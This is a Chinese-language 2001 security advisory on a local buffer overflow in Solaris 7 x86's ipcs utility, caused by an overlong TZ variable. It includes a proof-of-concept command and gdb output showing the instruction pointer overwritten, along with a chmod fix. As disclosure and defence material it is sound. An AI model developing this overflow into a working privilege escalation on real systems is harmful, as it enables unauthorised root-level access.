Solaris ipcs 存在缓冲溢出发布时间:2001-04-14 更新时间:2001-04-14 严重程度:高 威胁程度:本地管理员权限 错误类型:配置错误 利用方式:服务器模式 受影响系统 Solaris 7 (x86)详细描述 在Solair7中提供的工具/usr/bin/i86/ipcs存在缓冲溢出漏洞,问题存在于处理环境变量TZ(TIMEZONE)中,通过利用这个漏洞可以导致获得SYS组的权利。IPCS是用来收集在活动进程通信中的信息。 测试代码 bash-2.03$ TZ=`perl -e 'print "A"x1035'` bash-2.03$ /usr/bin/i86/ipcs IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001 Message Queue facility inactive. T ID KEY MODE OWNER GROUP Shared Memory: m 0 0x500004d3 --rw-r--r-- root root Semaphore facility inactive. Segmentation Fault (core dumped) Note: [buffer] is any 1036 (or so) character string. A's... bash-2.03$ su root Password: # gdb /usr/bin/i86/ipcs core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are <snip> #0 0x41414141 in ?? () (gdb) info reg eip eip 0x41414141 0x41414141 (gdb) 解决方案 chmod –s /usr/bin/i86/ipcs 相关信息 Riley Hassell riley@eeye.com |
